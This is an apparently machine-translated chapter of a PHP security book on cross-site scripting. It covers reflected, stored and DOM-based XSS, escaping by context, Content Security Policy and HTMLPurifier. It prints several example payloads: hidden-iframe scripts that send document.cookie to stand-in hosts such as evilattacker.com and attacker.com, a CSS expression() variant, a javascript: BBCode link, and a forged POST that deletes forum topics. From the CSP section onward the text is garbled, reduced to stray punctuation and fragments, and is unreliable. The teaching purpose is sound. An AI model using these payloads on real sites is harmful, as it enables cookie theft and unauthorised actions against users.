The book "Security in PHP" (part 3). Cross-site scripting (XSS)

The book "Security in PHP" (part 1)
The book "Security in PHP" (part 2)

Cross-site scripting (XSS) is perhaps the most common type of vulnerability widespread in web applications. According to statistics, about 65% of sites in one form or another are vulnerable to XSS attacks. This data should scare you just as they scare me.

What is crossite scripting?

A XSS attack occurs when an attacker gains the ability to inject a script (often JavaScript) into a page issued by a web application and execute it in the client’s browser. This is usually done by switching the context of the HTML data into the script context, most often when a new HTML, Javascript or CSS markup code is introduced. HTML has enough places to add an executable script to a page, and browsers provide many ways to do this. Any input to a web application, such as HTTP request parameters, is capable of embedding code.

One of the problems associated with XSS is the constant underestimation of programmers, which is atypical for vulnerabilities of such a serious level. Developers often do not realize the degree of threat and usually build a defense based on misconceptions and bad approaches. This is especially true of PHP, if the code is written by developers without sufficient skills and knowledge. In addition, real-life examples of XSS attacks look simple and naive, so the programmers who study them consider their protection sufficient as long as it suits them. It is not difficult to understand where 65% of vulnerable sites come from.

If an attacker can inject javascript into web pages and execute it, then he is able to execute any javascript in the user's browser. And it gives you complete control. Indeed, from the point of view of the browser, the script was obtained from a web application, which is automatically considered a reliable source.

Therefore I want to remind: any data that was not created by PHP for the current request is unreliable. This also applies to the browser, which works separately from the web application.

The browser trusts everything it receives from the server, and this is one of the main reasons for cross-site scripting. Fortunately, the problem is solved, as we will discuss below.

We can apply this principle even more broadly to the JavaScript application environment itself in the browser. Client-side JavaScript code ranges from very simple to extremely complex, often a separate client-side web application. Such applications should be protected no worse than any other. They should not trust data received from remote sources (including from the application on the server), applying validation and making sure that the content displayed in the DOM is correctly shielded or processed.

Embedded scripts can be used for a variety of tasks. It:

theft of cookies and authorization data,
performing HTTP requests on behalf of the user,
redirect users to infected sites,
getting access to read and change the browser's local storage,
performing complex calculations and sending results to the attacker's server,
Apply exploits to the browser and download malware,
emulation of user activity for clickjacking,
rewriting or gaining control over browser applications,
attacks on browser extensions -

and so on, you can continue to infinity.

Interface spoofing (UI Redress, clickjacking)

While the direct attack on the server is completely independent, clickjacking is inextricably linked with cross-site scripting, as it uses similar sets of vectors to attack. Sometimes they are difficult to distinguish, because one attack technique helps the successful execution of another.

Interface spoofing is any attacker's attempt to change the user interface of a web application. This allows an attacker to inject new links, a new HTML code to resize, hide / block the original interface, etc. If such an attack is performed to trick the user into clicking on the embedded link or button, then it is usually referred to as clickjacking.

Most of this chapter deals with interface spoofing with XSS. However, there are other methods of substitution when using frames for implementation. We will discuss this in more detail in Chapter 4.

Cross-site scripting example

Let's imagine that the attacker stumbled upon a forum that allows users to display a small signature under their comments. The attacker creates an account, spamming in all topics within reach, applying the following signature to his messages:

<script>document.write('<iframe src="http://evilattacker.com?cookie=' + document.cookie.escape() + '" height=0 width=0 />');</script>

By some miracle, the forum engine includes this signature in all spammed topics, and users begin to download this code. The result is obvious. The attacker injects an iframe into the page, which will be displayed as a tiny dot (size zero) at the very bottom of the page, without attracting any attention. The browser will send a request for the content of the iframe, and the values of the cookies of each forum participant will be transferred to the attacker's URI as a GET parameter. They can be compared and used for further attacks. While ordinary participants are not interested in an attacker, well-planned trolling will undoubtedly attract the attention of a moderator or administrator, whose cookies can be very useful for gaining administrative access to the forum.

This is a simple example, but you can extend it. Suppose an attacker wants to know the name of the user associated with the stolen cookies. Easy! It is enough to add a DOM request code to the attacker's URL, which will return the name and include it in the parameter username = GET request. Or did the attacker need browser information to bypass the session fingerprint protection? It is enough to enable data from navigator.userAgent.

This simple attack has many consequences. For example, you can get administrator rights and control over the forum. Therefore, it is not advisable to underestimate the possibilities of XSS attack.

Of course, in this example there is a flaw in the attacker's approach. Consider the obvious way to protect. All cookies with sensitive data are flagged with HttpOnly, which prevents JavaScript from accessing the data in these files. Basically, you should remember that if an attacker injects javascript, then this script will be able to do anything. If the attacker did not get access to the cookie and conduct an attack using it, then he will do what all good programmers must do: write the code for an effective automated attack.

  <script> var params = 'type=topic&action=delete&id=347'; var http = new XMLHttpRequest(); http.open('POST', 'forum.com/admin_control.php', true); http.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http.setRequestHeader("Content-length", params.length); http.setRequestHeader("Connection", "close"); http.onreadystatechange = function() { if(http.readyState == 4 && http.status == 200) { // Do something else. } }; http.send(params); </script>

Above is one of the ways to send a POST request that removes a forum topic. You can set it to work only for the moderator (i.e., if the username is displayed somewhere, we can compare it with a list of known moderators or find special styles applied to the moderator).

As follows from the above, HttpOnly cookies have limited use in protection against XSS. They block the capture of cookies, but do not prevent their use during an XSS attack. In addition, the attacker would prefer not to leave traces in the visible markup, so as not to arouse suspicion if he does not want to be detected.

Types of XSS Attacks

Attacks using XSS can be classified in several ways. One of them is by the way in which malicious input data get into web applications. The application's input data can include the result of the current query, which is saved for inclusion in a subsequent output query. Or data can be transferred to JavaScript-based DOM operations. Thus, the following types of attacks are obtained.

Reflected XSS attack

Here, the unreliable input data sent to the web application is immediately included in the application output data, i.e. it is “reflected” from the server to the browser in the same request. Reflection happens with error messages, search materials, previews of posts, etc. This form of attack can be organized to convince the user to follow the link or send data from the attacker's form. To force the user to click on unreliable links, sometimes social engineering, an interface spoofing attack or link shortening service is required. Social networks and link shortening services themselves are particularly vulnerable to URL spoofing using shortened links, since such links are common on these resources. Be careful and carefully check what you press!

Stored xss attack

When a malicious payload is somewhere stored and retrieved as the user views the data, the attack is stored. In addition to databases, there are many other places, including caches and logs, which are also suitable for long-term data storage. Already known cases of attacks with the introduction of the logs.

DOM-based XSS attack

A DOM-based attack can be both echoed and stored. The difference is in what the attack is aimed at. Most often try to immediately change the markup of the HTML-document. However, HTML can also be modified using JavaScript using the DOM. Elements successfully implemented in HTML can later be used in DOM operations in JavaScript. Attacks also target vulnerabilities in JS libraries or their incorrect use.

Cross-site scripting and deployment context

An XSS attack succeeds if context is implemented during it. The term “context” describes how browsers interpret the contents of an HTML document. Browsers recognize a number of key contexts, including HTML code, HTML attributes, JavaScript, URLs, CSS.

The attacker's goal is to take data intended for one of these contexts and force the browser to interpret it in another context. For example:

 <div style="background:<?php echo $colour ?>;">

$ color is filled from the database of user settings that affect the background color for the text block. The value is entered in the context of CSS, a child of the context of the HTML attribute. That is, we added CSS to the style attribute. It may not seem necessary to avoid such a trap with a context, but look at the following example:

 $colour = "expression(document.write('<iframe src=" .= "http://evilattacker.com?cookie=' + document.cookie.escape() + " .= "' height=0 width=0 />'))"; <div style="background:<?php echo $colour ?>;">

If an attacker successfully embeds this color, he can embed a CSS expression that will execute certain JavaScript in Internet Explorer. In other words, the attacker will be able to switch the current context by introducing a new JavaScript context.

Looking at the previous example, some readers will recall escaping. We use it:

 $colour = "expression(document.write('<iframe src=" .= "http://evilattacker.com?cookie=' + document.cookie.escape() + " .= "' height=0 width=0 />'))"; <div style="background:<?php echo htmlspecialchars($colour, ENT_QUOTES, 'UTF-8') ?>;">

If you check it in IE, you will quickly find out that something very bad is happening. The XSS attack still works successfully - even after shielding with the htmlspecialchars () function to avoid $ color!

This is how important it is to understand the context correctly. Each context requires a different screening method, because each context has its own special characters and different need for screening. It is not enough to scatter htmlspecialchars () and htmlentities () functions everywhere and pray that your web application is safe.

What went wrong in the previous example? What caused the browser to unscramble HTML attributes before interpreting the context? We ignored the fact that two contexts need to be screened.

First, the CSS should have escaped $ color, and only then - escaped HTML. This would ensure that $ color is converted to the correct string literal, without brackets, quotes, spaces, and other characters that allow expression () to be injected. Not realizing that our attribute covered two contexts, we screened it as if it were just one HTML attribute. Quite a common mistake.

A lesson can be learned from this situation: context is important. With a XSS attack, an attacker will always try to jump from the current context to another, where you can execute JavaScript. If you are able to determine all contexts in the HTML output stream with regard to their nesting, then you are ten steps closer to successfully protecting a web application from XSS.

Let's look at another example:

 <a href="http://www.example.com">Example.com</a>

If you do not take into account unreliable input data, then this code can be analyzed as follows:

There is a URL context, i.e. the value of the href attribute.
There is an HTML attribute context, i.e. parents of the URL context.
There is an HTML body context, i.e. the text inside the <a> tag.

These are three different contexts. So it will take up to three screening methods if the data sources are identified as unreliable. In the next section, we take a closer look at screening as protection against XSS.

Cross-site scripting protection

It is possible to protect oneself from XSS, but protection should be applied consistently, without exceptions and simplifications, preferably from the very beginning of developing a web application, while everyone has a fresh memory of the workflow. Implementing protection at later stages can be expensive.

Input Validation

Input validation is only the first line of protection for a web application. With this type of protection, we only know how unreliable data is being used now, and at the stage of obtaining data we cannot predict where and how they will be applied further. This includes almost all textual data, since we must always provide the user with the ability to write quotes, angle brackets and other characters.

Verification works best by preventing XSS attacks on data that have limit values. Suppose an integer should not contain HTML-specific characters. Parameters, such as the name of the country, must correspond to a predetermined list of real countries, etc.

Input validation helps control data with a specific syntax. For example, a valid URL must begin with the http: // or https: // prefix, and not with much more dangerous javascript: or data: constructs. In fact, all addresses obtained from unverified input data should be checked for the presence of these tags. Escaping javascript: or data: URIs has the same effect as escaping a legal URL. That is, no effect at all.

Although validating the input data cannot block the entire malicious payload during a XSS attack, it can stop the most obvious types of attack. Verification of input data was discussed in detail in the second part of the book.

Escaping (and encoding)

Escaping data at the output ensures that the data will not be mistakenly perceived by the receiving parser or interpreter. Obvious examples are the “less” and “more” signs, which denote HTML tags. If you allow these characters to be inserted from unreliable input data, the attacker will be able to enter new tags that the browser will draw. Typically, these characters are replaced by the sequences> and $ lt ;.

Replacing characters involves the preservation of meaning shielded data. Escaping simply replaces characters that have a specific meaning with alternative ones. Typically, a hexadecimal representation or something more readable is used, such as HTML sequences (if they are safe to use).

As mentioned in the chapter on contexts, the method of screening depends on what type of content is being injected. HTML escaping is different from JavaScript escaping, which, in turn, is different from escaping addresses. Applying the wrong shielding strategy for a particular context can lead to ineffective protection, creating vulnerabilities that can be exploited by an attacker.

To facilitate shielding, a separate class developed for this purpose is recommended. PHP cannot provide all the necessary screening functions out of the box, and much of the proposed is not as safe as most developers believe.
Let's look at the screening rules that apply to the most common contexts: HTML body, HTML attributes, JavaScript, URLs, and CSS.

Never enter data, except from trusted locations.

Before you learn screening strategies, you need to make sure that your web application templates do not lose (misplace) data. This refers to embedding data in sensitive areas of HTML that give an attacker the ability to influence the way the markup is processed and which usually do not require shielding when used by the programmer. Consider examples where [...] is the data being injected:

 <script>...</script> <!--...--> <div ...="test"/> <... href="http://www.example.com"/> <style>...</style>

Each of the above places is dangerous. Allowing data in the script tag, outside of string and numeric literals, allows you to inject JavaScript during an attack. Data placed in HTML comments can be used to launch Internet Explorer conditionals (conditionals) and for other unforeseen actions. The following two places are more obvious, since no one would allow an attacker to influence their tags or attribute names - we are just trying to prevent it! Finally, as is the case with scripts, we cannot allow attackers to infiltrate directly into CSS, as this will make it possible to conduct interface spoofing attacks and execute scripts using expression () supported in Internet Explorer.

Always escape HTML before embedding data into the HTML body.

The HTML body context refers to textual content that is enclosed in tags. For example, text between <body> , <div> tags, or any other paired tags to store text. The data embedded in the content of any tags must be escaped under HTML.

HTML escaping is well known in PHP as the htmlspecialchars () function.

Always escape HTML attributes before embedding data in their context.

The HTML attribute context refers to all element values, with the exception of properties that are interpreted by the browser as CDATA. This exception is rather confusing, but mainly refers to HTML standards that are not based on XML, where JavaScript can be included in the event attributes in an unshielded form. For all other attributes, you have the following two options:

If the attribute value is in quotes, then you MAY use HTML escaping.
However, if the value is given without quotes, then you MUST use HTML attribute escaping.

Also, the second option applies when the rules for casting attributes may be unclear. For example, in HTML5 it is considered quite acceptable to use attribute values without quotes, and in real projects there are already many examples of such a “smart” approach. In any incomprehensible situation, proceed with caution.

Always escape javascript before embedding in data values.

The data values in javascript are mostly string. Since you cannot escape numbers, there is an additional rule: always check the validity of numbers ...

Content Protection Policy

A key element of all our cross-site scripting conversations is that the browser without question executes all the JavaScript code that it receives from the server, regardless of the source code. When retrieving an HTML document, the browser cannot find out which of the nested resources are safe and which are not. And if we could change that?

Content Protection Policy (CSP) is an HTTP header that conveys a white list of trusted resources that the browser can trust. Any source not specified in the list of allowed sources is considered unreliable and is simply ignored. Consider the following:

 X-Content-Security-Policy: script-src 'self'

This CSP header tells the browser to trust only those JavaScript source addresses that point to the current domain. After the browser will load scripts from this source, but completely ignore all others. It means that http://attacker.com/naughty.js will not load if the attacker somehow manages to implement it. In addition, all embedded scripts, for example tags

If you need to use JavaScript from a source other than the source address, then we can include it in the white list. For example, let's add the jQuery CDN address.

 X-Content-Security-Policy: script-src 'self' http://code.jquery.com

You can add other resource directives, such as the path to a CSS style sheet, separating the directives and allowed addresses with a semicolon.

 X-Content-Security-Policy: script-src 'self' http://code.jquery.com; style-src 'self'

The format of the header value is very simple. The value consists of the script-src directive, followed by a list of sources separated by spaces, used as a white list. The source can be a keyword in quotes, such as 'self', or a URL. The value of the URL is matched to the list received. Information missing in the URL can be freely modified in the HTML document. Note http://code.jquery.com prevents scripts from being downloaded from http://jquery.com or http://domainx.jquery.com , because we explicitly set the allowed domains. To allow all subdomains, you can simply specify http://jquery.com . The same applies to local paths, ports, URL schemes, etc.

The essence of the CSP white list is simple. If you create a list of resources of a particular type, then everything that does not go into it will not load. If you do not define a list for the type of resources, then the default browser discards all resources of this type.

The following resource directives are supported:

connect-src: limits the sources to which you can connect using xmlhttprequest, web sockets, etc.
font-src: restricts sources for web fonts.
frame-src: limits the URLs for frames.
img-src: limits image sources.
media-src: limits the sources of video and audio.
object-src: restricts sources for Flash and other plugins.
script-src: limits sources for script files.
style-src: restricts sources for CSS.

To set safe standard parameters, there is a special directive default-src, with which you can initially add links to all the listed categories to the white list.

 X-Content-Security-Policy: default-src 'self'; script-src 'self' http://code.jquery.com

This will limit the allowed resources to the current domain, but also add an exception for the jQuery script. , .

URL, , :

 'none' 'self' 'unsafe-inline' 'unsafe-eval'

unsafe, . . «»? CSP — , . inline- ? inline-, - inline- . addEventListener() . , , ? Not this way. . 'unsafe-inline' CSP.

'none' «». , . , - , CSP , :

 X-Content-Security-Policy: default-src 'none'; script-src 'self' http://code.jquery.com; style-src 'self'

. CSP — , X-Content-Security-Policy, , WebKit-, Safari Chrome. WebKit .

 X-Content-Security-Policy: default-src 'none'; script-src 'self' http://code.jquery.com; style-src 'self' X-WebKit-CSP: default-src 'none'; script-src 'self' http://code.jquery.com; style-src 'self'

HTML

- - HTML- - . : , , RSS Atom. , , , , .

, HTML- « », « »? - HTML- , BBCode, Markdown Textile. PHP — , XSS-. . — , HTML. HTML, SGML-. HTML — .

HTML . , — . HTML - « ». . , HTML.

 [url=javascript:alert('I can haz Cookie?n'+document.cookie)]Free Bitcoins Here![/url]

BB- HTML , . , HTTP URL' . Markdown:

 I am a Markdown paragraph.<script>document.write('<iframe src=”http://attacker.com?cookie=' + document.cookie.escape() + '” height=0 width=0 />');</script> There's no need to panic. I swear I am just plain text!

Markdown — HTML, HTML Markdown. , Markdown XSS-.

, HTML , , . . , .

HTML — , , . , , PHP , , . «» , .

PHP, HTML, — HTMLPurifier. , , . HTMLPurifier , , :

 // Basic setup without a cache $config = HTMLPurifier_Config::createDefault(); $config->set('Core', 'Encoding', 'UTF-8'); $config->set('HTML', 'Doctype', 'HTML 4.01 Transitional'); // Create the whitelist $config->set('HTML.Allowed', 'p,b,a[href],i'); // basic formatting and links $sanitiser = new HTMLPurifier($config); $output = $sanitiser->purify($untrustedHtml);

HTML-, , .

[ ]

Source: https://habr.com/ru/post/352442/

All Articles